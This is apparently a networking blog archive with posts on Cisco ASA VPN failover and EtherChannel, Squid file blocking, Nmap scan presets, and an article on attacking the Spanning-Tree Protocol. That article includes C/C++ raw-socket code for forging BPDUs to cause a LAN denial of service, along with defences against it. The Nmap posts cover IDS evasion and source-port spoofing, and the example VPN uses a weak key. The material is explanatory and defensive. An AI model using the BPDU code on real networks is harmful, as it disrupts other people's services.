Octubre 24

Site-to-Site VPN with dual ISP for backup/redundancy

I recently came across this scenario where a customer had two internet links terminating on his ASA from two different ISPs. If his primary link (ISP2) was unavailable, he wanted the Site-to-Site VPN to fail over to the backup link (ISP3). This post shows you how to configure a firewall having two internet links using the SLA monitoring feature to get the required redundancy for the Site-to-Site VPN.

The site having two ISPs (in this case, FW2) is the one that needs major changes. Basic site-to-site configuration remains the same and only additional configuration for the backup peer IP 3.3.3.1 is covered under this post.

Backup Site-to-Site VPN - Peering with 2 peer IPs on a single firewall

On FW1:

2.2.2.1 is the primary peer IP for this VPN whose configuration is already in place and the tunnel is up and working.

1. Create tunnel group for the backup peer IP.

tunnel-group 3.3.3.1 type ipsec-l2l
tunnel-group 3.3.3.1 ipsec-attributes
 ikev1 pre-shared-key cisco

2. Add the backup peer IP to the existing crypto map for 2.2.2.1 and make sure the connection-type is set to bi-directional (which is the default).

crypto map outside_map 10 set peer 2.2.2.1 3.3.3.1
crypto map outside_map 10 set connection-type bi-directional

On FW2:

Interface configuration on FW2 firewall.

interface GigabitEthernet0
 description Connected to ISP2 - Primary link
 nameif outside
 security-level 0
 ip address 2.2.2.1 255.255.255.0 
!
interface GigabitEthernet1
 description Connected to ISP3 - Backup link
 nameif outside2
 security-level 0
 ip address 3.3.3.1 255.255.255.0

1. Create an SLA monitor to monitor the gateway IP of ISP2 (primary link). Add a default route pointing towards the gateway IP of ISP3 (secondary link) with an AD value 254. Track it using the SLA monitor.

sla monitor 10
 type echo protocol ipIcmpEcho 2.2.2.2 interface outside
 frequency 5
sla monitor schedule 10 life forever start-time now
!
track 1 rtr 10 reachability
!
route outside 0.0.0.0 0.0.0.0 2.2.2.2 1 track 1
route outside2 0.0.0.0 0.0.0.0 3.3.3.2 254

2. IKEv1 and ‘crypto map outside_map’ is already enabled and applied on the outside interface. When the ISP2 link goes down, the outside2 interface will be terminating the VPN and the following needs to be done for the VPN to establish. Also check for the connection-type which should be set to bi-directional (be default).

Enable ‘crypto ikev1’ and apply the ‘outside_map’ on the outside2 interface;

Existing config:

crypto ikev1 enable outside
crypto map outside_map interface outside
crypto map outside_map 10 set connection-type bi-directional

Additional config:

crypto ikev1 enable outside2
crypto map outside_map interface outside2

3. Create additional NAT statements for outside2 interface mirroring with your existing NAT.

Existing NAT:

nat (inside,outside) source static 10.2.2.0-24 10.2.2.0-24 destination static 10.1.1.0-24 10.1.1.0-24 no-proxy-arp route-lookup
nat (inside,outside) after-auto source dynamic any interface

Additional NAT:

nat (inside,outside2) source static 10.2.2.0-24 10.2.2.0-24 destination static 10.1.1.0-24 10.1.1.0-24 no-proxy-arp route-lookup
nat (inside,outside2) after-auto source dynamic any interface
Category: CISCO, VPN | Los comentarios están deshabilitados en Site-to-Site VPN with dual ISP for backup/redundancy
Mayo 27

Attacking the Spanning-Tree Protocol

Updated Proof of Concept available! Works with 2.6.x kernels.

Progress waits for nobody. Companies around the world are becoming more and more dependent on information technology. Non-stop access to email, file servers, databases and online services is no longer a competitive advantage – it’s a vital necessity, that employee productivity depends on. Constant network availability is one of the most important aspects one must consider when planning a network topology. User demands are increasing every year, as are the quality standards that modern networks must comply with.

Today’s networks must not only have low jitter and latency levels, but must also be redundant and achieve five-nine (99,999%) availability. This means only a bit over 5 minutes of down time per year. To achieve these high standards, networks are designed with redundancy in mind, that is multiple physical paths to every network segment.

Multiple physical paths create a highly undesirable condition within a network: switching loops. Network loops lead to broadcast storms, multiple frame copies, and MAC address-table instability. This is where the Spanning-Tree Protocol (STP) comes in. The role of the STP is to create a loop less logical topology, in redundant networks.

The purpose of this paper is to briefly describe the STP and it’s function in redundant network topologies. I describe the attack vector that can be used to disrupt the stability of the STP’s operations, and provide a working implementation as proof of concept.

Background Information: Redundant Network Topologies

Take a look at the network below. It illustrates a simple redundant topology. If someone pulls out the power plug of one of the Layer 2 Switches (green) (for example, the janitor, because he needed a place to plug in his vacuum cleaner), or there is a network cable failure between a L2 and the L3 Switch (red), the network will still operate, because there is more than one path to any network segment.

If a physical link between the Layer 3 Switch (red) and a Layer 2 Switch (green) fails, this redundant network topology will remain operational.

Redundant topologies naturally have physical loops within them. Because layer 2 frames have on Time-To-Live mechanism, loops within a network lead to switching problems like broadcast storms and MAC address-table instability instability. This results in high latency, unreliable network operations, and in turn user complains.

Spanning-Tree Protocol Operations

Defined in the IEEE 802.1d, the STP was designed to ensure a loop less network environment. It allows switches to create a loop free logical topology, even if the network has physical loops within it. The STP operates by moving switch ports into blocking or forwarding states depending on the segments they connect to. There are three basic steps in which STP establishes it’s topology: electing the root bridge, selecting one root port on every non-root bridge and selecting one designated port per network segment.

Electing the root bridge is done by exchanging Layer 2 Bridge Protocol Data Units (BPDUs).

When the STP is in use every port on a switch goes through several stages.

After about 50s every port on a switch is placed either in forwarding or blocking state, thus creating a logical, loop-free topology. During the election process each switch sends and receives BPDUs and processes received BPDUs to determine the root bridge. A BPDU looks like this (in C language):

struct ether_header
{
	u8  	dhost[6]; // destination MAC 
	// (STP multicast: 01-80-C2-00-00-00)
	
	u8  	shost[6]; // = 0x0000 for our purposes
	u16 	size;     // = 52  for our purposes
} __attribute__ ((packed));

struct llc_header {
	u8 dsap; 	// = 0x42 for our purposes
	u8 ssap; 	// = 0x42 for our purposes
	u8 func; 	// = 0x03 for our purposes
} __attribute__ ((packed));

struct stp_header {
	struct 	llc_header llc;
	u16 	type; 	// = 0x0000 for our purposes
	u8	version; 	// = 0x00  for our purposes
	u8	config; 	// = 0x00  for our purposes
	u8	flags; 		// = 0x00  for our purposes
	
	union {
		u8    root_id[8];	
		struct {
			u16	root_priority; 
			u8    	root_hdwaddr[6]; 	
		} root_data;
	};
	u32	root_path_cost; 	// = 0x00  for our purposes
	
	union {
		u8    bridge_id[8];	
		struct {
			u16	bridge_priority; 		
			u8    bridge_hdwaddr[6];
		} bridge_data;
	};
	
	u16 	port_id; 		// = 0x8002  for our purposes
	u16 	message_age; 	// = 0x0000  for our purposes
	u16 	max_age; 		// = 0x0001  for our purposes
	u16 	hello_time; 	// = 0x0001  for our purposes
	u16 	forward_delay; 	// = 0x0001  for our purposes
} __attribute__ ((packed));

typedef struct {
	struct ether_header eth;
	struct stp_header stp;
} eth_stp;

The root_priority and root_hdwaddr[6] fields together form a 8 octet bridge ID. The bridge with the lowest ID becomes the root bridge. When sending BPDUs the switch sets the root ID to it’s own ID. Because every switch stops sending BPDUs when it receives a BPDU with a lower root ID then it’s own, eventually the only switch sending BPDUs is the root bridge.

After the root bridge elections, every switch sets it’s ports to either forwarding or blocking states. The network might look something like this:

If a network topology change occurs (a link goes down or a new switch goes down/is added to the network), the election process must be repeated. To indicate that it’s still operating, the root switch continuously sends its BPDUs. These intervals are controlled by the hello_time field in the BPDUs (by default 2 seconds). If every switch within the broadcast domain doesn’t receive the root bridge’s BPDUs within the time defined in the max_age field, the root bridge is considered down and a new election is started.

Attack Vector

Our attack vector is to disrupt the switch’s spanning-trees, destabilize their MAC address-tables and hold the network in a constant state of reelecting the root bridge. We can achieve this, because there is no authentication mechanism build into the STP.

By crafting BPDUs of a non-existent switch with an ID of 1, we can elect our non-existent switch the root bridge. By using a minimal max-age for our crafted packets, and not sending BPDUs within that time, we will cause another election on our network, during which we will start sending our BPDUs, once again winning elections and becoming the root bridge.

By repeating this process, the network will be in a constant state of reelecting the root bridge, and any broadcast or multicast traffic will cause a broadcast storm, saturating a network with frames.

Let’s see how we can make this happen under Linux. First we must create a low level socket to craft our packets. The Spanning-Tree Protocol operates at the data-link layer. We will need to create our packets from the very lowest layer, including the headers for our Ethernet frames. But first the socket:

int fd;
if ((fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) == -1) {
	perror("socket:");
		return 0;
}

Sending frames in Linux at layer 2 requires using the sockaddr_ll structure when calling the sento() function. This structure is defined in include/linux/if_packet.h as:

struct sockaddr_ll
{
        unsigned short  sll_family;
        unsigned short  sll_protocol;
        int             sll_ifindex;
        unsigned short  sll_hatype;
        unsigned char   sll_pkttype;
        unsigned char   sll_halen;
        unsigned char   sll_addr[8];
};

We set the sll_family field to AF_PACKET and sll_protocol to 0. In order to retrieve the interface index we want to set in sll_ifindex, we must use the ifreq structure and ioctl() function. sll_hatype, sll_pkttype and sll_halen should equal 1, 0 and 6 respectively. Finally we set the interfaces hardware address in sll_addr[8]. First we must have the identifier for the interface we want to use in text form like eth0 or fxp0, or whatever. See the following example:

char *interface_name = "eth0";
sockaddr_ll sock;
ifreq ifr;

int tmpfd = socket (AF_INET, SOCK_DGRAM, 0);
strncpy (ifr.ifr_name, interface_name, strlen(interface_name));

ioctl (tmpfd, SIOCGIFINDEX, &ifr);    // get interface index
sock.sll_ifindex = ifr.ifr_ifindex;   // set it in sock struct     

ioctl (tmpfd, SIOCGIFHWADDR, &ifr);   // get interface addr	
memcpy (sock.sll_addr, ifr.ifr_hwaddr.sa_data, 6); 

close (tmpfd);

Next we can proceed to craft our BPDUs. We start of by defining a root bridge identifier. In order to elect our “ghost” bridge as root, it must have the lowest identifier in the network. Priority and hardware address are the two components of the the bridge ID. The first two bytes are the priority, the next 6 are the MAC address. By definition priority varies between 1 and 32768, therefore setting it the ID to [0x00][0x01][anything x 6 bytes] should yield expected results. We are two approaches here: a) to use the same bridge ID in every packet b) we can randomize it for every frame.

char shwaddr[8];
shwaddr[0] = 0x00;
shwaddr[1] = 0x01;

a)
memcpy(shwaddr + 2, ifr.ifr_hwaddr.sa_data, 6);

b)
void make_rand_hwaddr(char *buf)
{
	for (int i(0); i < 6; ++i)
		buf[i] = rand() % 256;
}

make_rand_hwaddr(shwaddr + 2);

Next we create and fill a eth_stp structure. In my implementation I use the following functions:

u16 atohex (u8 *hex)
{
	short int x,y,a,a2=0;
	char buf[2];

	char nums[] = {"0123456789abcdef"};

	memcpy(buf, hex, 2);	
	for (int x(0); x < 2; ++x) {
		for (int y(0); y < 16; ++y) {
			if (buf[x] == nums[y]) {
				if (x == 0) 
					a = (y) * 16;   
				else 
					a = y;
				a2 +=a;
	   		}
	    }
	}
	return a2;
}

u8 *ascii_to_hwaddr (const char *hwaddr)
{
	u8 t[2];
	u8 y(0);
	static u8 buf[6];
	do {     
	    t[0] = *hwaddr++;	
	    t[1] = *hwaddr++;
	    hwaddr++;
	    buf[y] = atohex (t);
	    y++;
	} while (y < 6);
	
	return (buf);
}

const char *fill_stp_header(char *shwaddr, bool topology_change,
	char *root_id, u32 forward_delay, u32 max_age, u32 hello_time, 
	u32 port_id)
{
	static eth_stp stp_packet;
	memset(&stp_packet, 0, sizeof(stp_packet));

	memcpy(stp_packet.eth.dhost, 
		ascii_to_hwaddr("01-80-c2-00-00-00"), 6);
	memcpy (stp_packet.eth.shost, shwaddr, 6);  
	memcpy(stp_packet.stp.root_id, root_id, 8);
	memcpy(stp_packet.stp.bridge_id, root_id, 8);

    	stp_packet.eth.size = htons(0x0034);
	stp_packet.stp.llc.dsap = 0x42;
	stp_packet.stp.llc.ssap = 0x42;
	stp_packet.stp.llc.func = 0x03;
	stp_packet.stp.port_id = port_id;
	stp_packet.stp.hello_time = hello_time;
	stp_packet.stp.max_age = max_age;
	stp_packet.stp.forward_delay = forward_delay;

	if (topology_change)
		stp_packet.stp.flags = 0x01;
	
	return (const char*) &stp_packet;
}

In the function fill_stp_header() the parameters have the following meaning

  • *shaddr – the source MAC address for our packet (we can use a valid one or spoof an non-existent address. This must be a pointer to a 6 byte buffer.
  • topology_change – a false/true parameter. If true, the topology_change flag will be set in our STP frame, making other bridges “re-announce” the change of the root bridge.
  • *root_id – this a pointer to a 8 byte buffer containing the root bridge id (2 byte priority + 6 byte MAC).
  • forward_delay – the delay in seconds that the switch ports should spend in listening and learning modes before going to learning and forwarding modes respectively. Refer to the “Spanning-Tree Protocol Operations” section for details.
  • max_age – the number of seconds a switch should wait without receiving STP frames, before considering the root bridge down and restarting the election process.
  • hello_time – the number of seconds within which switches expect to receive BPDUs.
  • port_id – the ID of the port on the sending bridge.

After we have prepared our header and gathered all the necessary information, we can send our frames using the very basic sendto() function.

const char *buf = fill_stp_header(shwaddr + 2, topology_change, 
	shwaddr, forward_delay, max_age, hello_time, port_id);

int fd;
if ((fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) == -1) {
	perror("socket:");
	return 0;
}
			
if ((sendto (fd, buf, sizeof(eth_stp), 0, (struct sockaddr*)&sock, 
	sizeof(sockaddr_ll))) == -1) {
	perror("sendto:");
	return 0;
}

This concludes the code writing section of this document. The described vulnerability permits all sorts of attacks, not just the simple denial of service that I described. For more details refer to [1].

Protecting Your Networks

There are a couple of simple methods to prevent the exploitation of the STP vulnerability in your network. For any STP attack to be feasible, the switch must accept BPDUs on a port that the attacker has access to. It is therefore possible to make such an attack impossible by denying access to STP enabled ports to ordinary users. This can be done by disabling STP on access ports, having port security enabled on all user ports, and restricting physical access to network equipment.

With disabled STP on user ports, the attacker would have to access the switch physically and use a switch-to-switch port to connect his computer to (assuming all non-used ports are either disabled or have STP disabled). If you cannot restrict physical access to your network devices, other measures must be taken to ensure network security. Port security is a feature that allows the switch to accept frames from only a given number (usually the first learned) of source MAC addresses. Enabling port security on user ports will make the attack unfeasible without prior network sniffing or hijacking a user’s workstation.

Conclusion

While most network administrators concentrate on security issues regarding the upper layers of the OSI model (3-7) like route poisoning, access filtering and exploitable service bugs, many still neglect the basic security risks of the physical and data link layers. Restricting physical access to network devices is an important part of one’s security policy, but securing the data link shouldn’t go overlooked. In the past the second layer of the OSI model had to handle forwarding and physical addressing. As the demand we put on network has grown so has the complexity of the protocols working at this level.

The Spanning-Tree Protocol’s flaws are minor, but can lead to a denial of service that can be carried out by even a relatively unskilled attacker. The measures that can be taken to prevent the attack should become a standard for basic security in LAN environments.

Proof of Concept – C++ Code

Proof of concept code of Spanning-Tree Protocol vulnerabilities written in C++.

<b>md5sum:</b> 8e516dba2a8b1451d753f0761567a5a0  stp-spoof-0.2.tar.bz2
Category: NETWORKING, STP | Los comentarios están deshabilitados en Attacking the Spanning-Tree Protocol
Abril 4

Etherchannel (Port Channel) on Cisco ASA

Generally Cisco ASA has one Management interface and four Gigabit Interfaces, but in modern systems and scalable Infrastructures you will need more than four Interfaces. To overcome this limitation you can configure some VLANs and trunk them to an Interfaces. This was a standard solution to this problem, however since ASA version 8.4.2 you are able to use Ether Channel to solve this problem.

The benefit of Ether Channel or Port Channel is that you are able to configure redundancy and load balancing in the same time; all four ASA Interfaces will be bundle to a link in the Layer 2 then you assign all VLANs directly to the Port Channel and so they applied to all Interfaces of ASA .

The ASA distributes the traffics to all Interfaces, which means you have the functioning Load balancing, furthermore if you lost one or two Interface the whole traffics will be distribute to the Interfaces which are available.
If you run the Port Channel on the ASA then you are permitted to make up to 200 VLANs.

Zeichnung2

The Port Channel’s configuration is not really tricky but it is a little bit complex and it will be best if you keep the history of what you have changed to not lose overview of what and why you actually configured.
Here you can see the Port Channel configuration on an ASA 5540 and a Catalyst 2960.
OK, first of all you have the configure the Port Channel on the Catalyst; it is very simple something like that:

!
interface Port-channel1
switchport mode trunk
!

Then I apply the Port Channel configuration, to four catalysts Interfaces which are connected to the ASA (in this case GigabitEthernet1/12 till GigabitEthernet1/15 :

!
interface GigabitEthernet1/12
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/13
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/14
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!
interface GigabitEthernet1/15
description UpLink to ASA
switchport mode trunk
channel-group 1 mode on
!

 

Ok we are finish with catalyst configuration; now let’s go to the ASA
Now we have to create the Port Channel:

 

!
interface Port-channel1
no nameif
no security-level
no ip address
!

 

We apply the Port Channel 1 to four Interfaces:
!
interface GigabitEthernet0
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet1
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet2
channel-group 1 mode on
no nameif
no security-level
no ip address
!
interface GigabitEthernet3
channel-group 1 mode on
no nameif
no security-level
no ip address
!
The next steps are very important , for each VLANs you have to create a port-channel sub-Interfaces, in there you define the VLAN ID , IP address and the security-Level , I will show you here one inside and one OUTSIDE sub-interface:
!
interface Port-channel1.10
vlan 10
nameif inside
security-level 100
ip address 192.168.XX.XXX 255.255.255.0
!
and
!
interface Port-channel1.1000
vlan 1000
nameif OUTSIDE
security-level 0
ip address dhcp setroute
!
Well, that is all. !!

It is important to have the same VLAN’s number and VLAN’s ID of both side, there when you have a new VLAN you should apply that configuration in Catalyst first. For debugging and control the Port Channels you can use the :

show port-channel summary
 
Number of channel-groups in use: 1
Group Port-channel Protocol Ports
------+-------------+-----------+-------------------------------------
1 Po1(U) LACP Gi0/0(P) Gi0/1(P) Gi0/2(P) Gi0/3(P)

The command displays the number of Port Channel group and which Interfaces are member to this ; furthermore you can see the Channel-Group Protocol LACP ( Link Aggregation Control Protocol) ;you have to consider that Cisco ASA support LACP only (no PAgP ) ; you get more useful information by using :

Show port-channel detail

 

Group: 1
----------
Ports: 4 Maxports = 16 you see we use four Interfaces (Ports 4) you can extend that up to 16 Physical Interfaces
Port-channels: 1 Max Port-channels= 48 you can configure 48 different Port Channel group
Protocol: LACP/ active
Minimum Links: 2  this is the minimum number of physical Interfaces for a Port Channel Group
Maximum Bundle: 8 you can put maximal 8 physical Interface to a Port Channel
Load balance: src-dst-ip
Ports in the group:
-------------------

For the Catalyst I prefer to use the :

1
sho etherchannel port-channel
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
sho etherchannel port-channel
Channel-group listing:
----------------------
Group: 1
----------
Port-channels in the group:
---------------------------
Port-channel: Po1 (Primary Aggregator)
------------
Age of the Port-channel = 761d:02h:50m:21s
Logical slot/port = 5/1 Number of ports = 4
HotStandBy port = null
Port state = Port-channel Ag-Inuse
Protocol = LACP
Port security = Disabled
Ports in the Port-channel:
Index Load Port EC state No of bits
------+------+------+------------------+-----------
0 00 Gi1/0/45 Active 0
0 00 Gi1/0/46 Active 0
0 00 Gi1/0/47 Active 0
0 00 Gi1/0/48 Active 0
 
Time since last port bundled: 749d:02h:28m:31s Gi1/0/46

Just as the commands in the ASA , the catalyst will show you now the number of Port Channel , port channel status and the physical Interfaces which are applied to this Port Channel group .

Don’t worry about the Spanning-tree Protocol (STP ) on the Catalyst , the STP counts the four EtherChannel’s Interfaces as “one” link like a single port so no member of the EtherChannel will be blocked from STP to prevent looping , I personally use the portfast for each Port Channel member Interface but you have to modify the command for a trunk interface :

1
spanning-tree portfast trunk

 

Category: ASA, CISCO | Los comentarios están deshabilitados en Etherchannel (Port Channel) on Cisco ASA
Marzo 25

Squid content filtering: Block / download of music MP3, mpg, mpeg, exec files

Q. For security and to save bandwidth I would like to configure Squid proxy server such way that I do not want my users to download all of the following files:
MP3
MPEG
MPG
AVG
AVI
EXE

How do I configure squid content filtering?

A. You can use squid ACL (access control list) to block all these files easily.

How do I block music files using squid content filtering ACL?

First open squid.conf file /etc/squid/squid.conf:

# vi /etc/squid/squid.conf
Now add following lines to your squid ACL section:

acl blockfiles urlpath_regex "/etc/squid/blocks.files.acl"
You want display custom error message when a file is blocked:
# Deny all blocked extension
deny_info ERR_BLOCKED_FILES blockfiles
http_access deny blockfiles

Save and close the file.

Create custom error message HTML file called ERR_BLOCKED_FILES in /etc/squid/error/ directory or /usr/share/squid/errors/English directory.
# vi ERR_BLOCKED_FILES
Append following content:

<tt>&lt;HTML&gt;
&lt;HEAD&gt;
&lt;TITLE&gt;ERROR: Blocked file content&lt;/TITLE&gt;
&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;H1&gt;File is blocked due to new IT policy&lt;/H1&gt;
&lt;p&gt;Please contact helpdesk for more information:&lt;/p&gt;
Phone: 555-12435 (ext 44)&lt;br&gt;
Email: helpdesk@yourcorp.com&lt;br&gt;
</tt>

Caution: Do not include HTML close tags </HTML> </BODY> as it will be closed by squid.
Now create /etc/squid/blocks.files.acl file:
# vi /etc/squid/blocks.files.acl
Append following text:
\.[Ee][Xx][Ee]$
\.[Aa][Vv][Ii]$
\.[Mm][Pp][Gg]$
\.[Mm][Pp][Ee][Gg]$
\.[Mm][Pp]3$

Save and close the file. Restart Squid:
# /etc/init.d/squid restart

Squid in action:

Squid content filtering howto

Category: NETWORKING, PROXY | Los comentarios están deshabilitados en Squid content filtering: Block / download of music MP3, mpg, mpeg, exec files
Septiembre 28

Nmap preset scans – Options and scan types explained

The presets

Before we go into the different options in use I will make a brief explanation of each of the presets that come with Zenmap.

Intense scan

Command: nmap -T4 -A -v <target>

Should be reasonable quick, scan the most common TCP ports. It will make an effort in determining the OS type and what services and their versions are running.

This comes from having a pretty fast timing template (-T4) and for using the -A option which will try determine services, versions and OS. With the verbose output (-v) it will also give us a lot of feedback as Nmap makes progress in the scan.

Intense scan plus UDP

Command: nmap -sS -sU -T4 -A -v <target>

Same as the regular Intense scan, just that we will also scan UDP ports (-sU).

The -sS option is telling Nmap that it should also scan TCP ports using SYN packets. Because this scan includes UDP ports this explicit definition of -sS is necessary.

Intense scan, all TCP ports

Command: nmap -p 1-65535 -T4 -A -v <target>

Leave no TCP ports unchecked.

Normally Nmap scans a list of 1000 most common protocols, but instead we will in this example scan everything from port 1 to 65535 (max). The 1000 most common protocols listing can be found in the file called nmap-services.

Intense scan, no ping

Command: nmap -T4 -A -v -Pn <target>

Just like the other intense scans, however this will assume the host is up. Usefull if the target is blocking ping request and you already know the target is up.

Ping scan

Command: nmap -sn <target>

Do only a ping only on the target, no port scan.

Quick scan

Command: nmap -T4 -F <target>

Scan faster than the intense scan by limiting the number of TCP ports scanned to only the top 100 most common TCP ports.

Quick scan plus

Command: nmap -sV -T4 -O -F –version-light <target>

Add a little bit of version and OS detection and you got the Quick scan plus.

Quick traceroute

Command: nmap -sn –traceroute <target>

Use this option when you need to determine hosts and routers in a network scan. It will traceroute and ping all hosts defined in the target.

Regular scan

Command: nmap <target>

Default everything. This means it will issue a TCP SYN scan for the most common 1000 TCP ports, using ICMP Echo request (ping) for host detection.

Slow comprehensive scan

Command: nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 –script “default or (discovery and safe)” <target>

This scan has a whole bunch of options in it and it may seem daunting to understand at first. It is however not so complicated once you take a closer look at the options. The scan can be said to be a “Intense scan plus UDP” plus some extras features.

It will put a whole lot of effort into host detection, not giving up if the initial ping request fails. It uses three different protocols in order to detect the hosts; TCP, UDP and SCTP.

If a host is detected it will do its best in determining what OS, services and versions the host are running based on the most common TCP and UDP services. Also the scan camouflages itself as source port 53 (DNS).

The options

-T4    This is an option for timing template. Numbers range from 0-5 where 5 is the fastest and 0 is the slowest.

So what is a timing template? Basically it is Nmap’s developers giving the user an easy way of tuning how fast Nmap performs. The Nmap manual translates the different numbers to this:
0: paranoid 1: sneaky 2: polite 3: normal 4: aggressive 5: insane

Again, this translates into 1-2 being used for IDS evasion, 3 is the default and 4-5 is really quick scans. As an example when I run a regular scan on one host with -T2 it took me 400 seconds while -T5 0.07 seconds. Read more about this in the Timing and Performancesection of the manual.

-A    This options makes Nmap make an effort in identifying the target OS, services and the versions. It also does traceroute and applies NSE scripts to detect additional information. This is a quite noisy scan as it applies many different scans. The NSE scripts applied is the default setting of scripts.

The -A option is equivalent to applying the following options to your scan: -sC -sV -O –traceroute

-v    Increased verbosity. This will give your extra information in the data outputted by Nmap.

-sS    Perform a TCP SYN connect scan. This just means that Nmap will send a TCP SYN packet just like any normal application would do. If the port is open the application must reply with SYN/ACK, however to prevent half open connections Nmap will send a RST to tear down the connection again. If you were to look at such a scan in Wireshark you would see something like this:

Looking at a TCP SYN scan in Wireshark against port 80. In this case the port was open.

-sU    Perform an UDP scan. Because UDP is unreliable it is not as easy to determine if ports are open as it is with TCP. The UDP scan sends an UDP packet with an empty header to the target port. If the port is closed the OS should reply with an ICMP port unreachable error, however if the port is open it does not necessarily mean that the service will reply with anything.

If service scan (-sV) is enabled in the scan, Nmap will send additional packets with different payloads in order to try trigger a response from the service. This type of scanning can be really slow because a typical OS will only allow about 1 ICMP packet per second. The following Wireshark screenshots illustrates where UDP port 69 is closed and UDP port 68 is either open or filtered.

Port 69 closed and 68 is open

-sN   TCP Null scan. This option sends TCP packets with none of the TCP flags set in the packet. If the scan is returned a RST packet it means the port is closed, however if nothing is returned it is either filtered or open. The following picture is an illustration in Wireshark showing none of the TCP flags have been set:

None of the TCP flags in the packet have been set

-sV    Actively probe open ports to try determine what service and version they are running. When running this scan against my webserver it resulted in 14 packets being transmitted between client and server, in contrast to just 2 packets as with a regular SYN scan. The picture below shows version scanning packets being sent to the server and the response coming from the server. The HTTP header reveals the webserver, version and OS type in play.

Nmap version scanning HTTP service

-p    Comma seperated list of ports being scanned. Easy way to define only a few ports to scan or increase the scope of the scan to e.g. every available TCP port.

-F    Fast mode. Instead of scanning as many ports as the default scan does, the fast scan only scans a few. As a comparison, when I scanned with fast mode there was 202 packets exchanged, and with default scan (no parameters) there was 2002 packets exchanged. Both scans discovered port 80 and 22 open on the target host.

-O    Make Nmap try decide what OS type it is. The process of OS detection can be quite complex, but also quite simple. It is based of many different factors which I cannot go through here. A simple factor to try decide whether it is a Windows OS or Unix OS is to look at the TTL (Time to live) field on packets being sent from the OS. Windows usually defaults to 128 while Unix defaults to 64.

–traceroute   Perform a traceroute to the target.

–version-light    This is an option for the service detection scans (-sV and -A) where it limits the number of probes being sent to the service. The limitation brought by this option means it will only probe the services with the most likely types of probes bringing back a successful result. If you are curious about what probes Nmap sends I recommend using the –version-trace option to get detailed information about the scan. An excerpt of different types of SSH probes can be seen here:

-PE    This parameter is used to decide how Nmap discovers hosts, and this one decides that Nmap should use ICMP echo requests to deciding if a host is up or not. This is the same as performing a ping to the target host in determining if it is up or not.

-PP    This defines that instead of a regular ICMP echo request should be used in determining if host is up or not, Nmap should send a ICMP Timestamp request. This special type of ICMP request is originally used for synchronizing timestamps between communicating nodes, but has been replaced by the more common network time protocol. This type of scan was not successfull in determining if my host was up or not.

ICMP host discovery in action. In this example I’ve first run -PE, then -PP and finally -PM (which is not explained in this article)

-PS    Also used for host discovery. This option simply relies on a port (default 80) to reply to an empty SYN packet, as is with default TCP behaviour. Simple is often good.

In the preset scans you will notice that argument 80,443 is given to this option. These are common ports used for webservers and are often open on targets.

-PA    Much like the -PS option, this one sends a TCP packet with the ACK flag set instead. This should cause the responding server to respond with a RST packet if it is listening on that port as it is not expecting any data to be acknowledged by an ACK packet. Sometimes firewall administrators configure the firewall to drop incoming SYN packets to prevent any traffic, which would allow for ACK packets to pass through.

In the preset scans you will notice that argument 3389 is given to this option. This is the port for remote desktop which is a service often enabled on servers. When other host detection methods fail, this may increase the success chance.

-PU    This sends out a UDP packet destined to the target port (default 40125) in order to try elicit a an “ICMP Port unreachable” message from the server. Sometimes firewalls also only drop TCP packets and dont care about UDP packets, allowing this type of packets through. Some configurations also allow any type of packet through where only TCP should be allowed.  Camoflaging your host discovery as an UDP packet on port 53 (DNS) could be a very stealthy approach.

-PY    Very much like a TCP SYN scan, this just utilizes the SCTP (Stream Control Transmission Protocol) instead.

-g    Specify what source port you want to use. Note that this is different from what destination port you are scanning. The real use for this comes with trying to evade IDS or blending inn with other regular data.

–script    Via NSE (Nmap scripting engine) it is possible for anyone to write custom made scripts for Nmap to use. This parameter takes in a comma seperated list of files, categories and directories containing NSE scripts. Because NSE supports expressions you can tell Nmap to load scripts in many different ways.

With the “default or (discovery and safe)” argument it will tell Nmap to load all scripts from the default category, and only the scripts in discovery category that are also in the safe category.

-Pn    Assume the host is up thus skipping the host discovery phase.

-sn    Only send ping packet to the target, no port scanning. This is usefull if you need to determine what hosts are in the vicinity, but do not want to scan them yet. Do not mistake this for the TCP Null scan (-sN);  Nmap is case sensitive.

 

Thats all folks! Happy scanning!

Category: NETWORKING | Los comentarios están deshabilitados en Nmap preset scans – Options and scan types explained
Septiembre 28

NMAP

[Intense scan]
command = nmap -T4 -A -v
description = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.

[Intense scan plus UDP]
command = nmap -sS -sU -T4 -A -v
description = Does OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) in addition to scanning TCP and UDP ports.

[Intense scan, all TCP ports]
command = nmap -p 1-65535 -T4 -A -v
description = Scans all TCP ports, then does OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute).

[Intense scan, no ping]
command = nmap -T4 -A -v -Pn
description = Does an intense scan without checking to see if targets are up first. This can be useful when a target seems to ignore the usual host discovery probes.

[Ping scan]
command = nmap -sn
description = This scan only finds which targets are up and does not port scan them.

[Quick scan]
command = nmap -T4 -F
description = This scan is faster than a normal scan because it uses the aggressive timing template and scans fewer ports.

[Quick scan plus]
command = nmap -sV -T4 -O -F --version-light
description = A quick scan plus OS and version detection.

[Quick traceroute]
command = nmap -sn --traceroute
description = Traces the paths to targets without doing a full port scan on them.

[Regular scan]
command = nmap
description = A basic port scan with no extra options.

[Slow comprehensive scan]
command = nmap -sS -sU -T4 -A -v -PE -PS80,443 -PA3389 -PP -PU40125 -PY --source-port 53 --script "default or (discovery and safe)"
description = This is a comprehensive, slow scan. Every TCP and UDP port is scanned. OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute) are all enabled. Many probes are sent for host discovery. This is a highly intrusive scan.
Category: NETWORKING, SECURITY | Los comentarios están deshabilitados en NMAP
Septiembre 25

IP TO ASN MAPPING

For example, to enable the verbose mode (all flags) one would use:

